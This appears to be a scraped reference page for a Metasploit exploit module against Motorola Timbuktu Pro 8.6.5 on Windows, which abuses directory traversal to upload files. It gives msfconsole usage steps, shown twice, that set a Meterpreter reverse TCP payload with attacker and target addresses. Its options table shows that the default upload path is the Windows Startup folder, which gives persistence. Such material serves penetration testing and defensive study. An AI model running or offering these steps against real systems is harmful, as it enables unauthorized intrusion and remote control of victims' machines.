Timbuktu Pro Directory Traversal/File Upload
This module exploits a directory traversal vulnerablity in Motorola's Timbuktu Pro for Windows 8.6.5.
Exploit Rank
- Excellent
Exploit Authors
- MC < mc [at] metasploit.com >
Vulnerability References
Exploit Targets
- 0 - Automatic (default)
Exploit Development
Similar Exploit Modules
Exploit Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/windows/motorola/timbuktu_fileupload
msf exploit(timbuktu_fileupload) > show payloads
msf exploit(timbuktu_fileupload) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(timbuktu_fileupload) > set LHOST [MY IP ADDRESS]
msf exploit(timbuktu_fileupload) > set RHOST [TARGET IP]
msf exploit(timbuktu_fileupload) > exploit
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/windows/motorola/timbuktu_fileupload
msf exploit(timbuktu_fileupload) > show payloads
msf exploit(timbuktu_fileupload) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(timbuktu_fileupload) > set LHOST [MY IP ADDRESS]
msf exploit(timbuktu_fileupload) > set RHOST [TARGET IP]
msf exploit(timbuktu_fileupload) > exploit
Exploit Module Options
| PATH | The path to place the executable. (default: \../../../Documents and Settings/All Users/Start Menu/Programs/Startup/) |
| RHOST | The target address |
| RPORT | The target port (default: 407) |
| CHOST | The local client address |
| CPORT | The local client port |
| ConnectTimeout | Maximum number of seconds to establish a TCP connection |
| ContextInformationFile | The information file that contains context information |
| DisablePayloadHandler | Disable the handler code for the selected payload |
| EXE::Custom | Use custom exe instead of automatically generating a payload exe |
| EXE::FallBack | Use the default template in case the specified one is missing |
| EXE::Inject | Set to preserve the original EXE function |
| EXE::OldMethod | Set to use the substitution EXE generation method. |
| EXE::Path | The directory in which to look for the executable template |
| EXE::Template | The executable template file name. |
| EnableContextEncoding | Use transient context when encoding payloads |
| Proxies | Use a proxy chain |
| SSL | Negotiate SSL for outgoing connections |
| SSLVersion | Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |
| WfsDelay | Additional delay when waiting for a session |
| TCP::max_send_size | Maxiumum tcp segment size. (0 = disable) |
| TCP::send_delay | Delays inserted before every send. (0 = disable) |
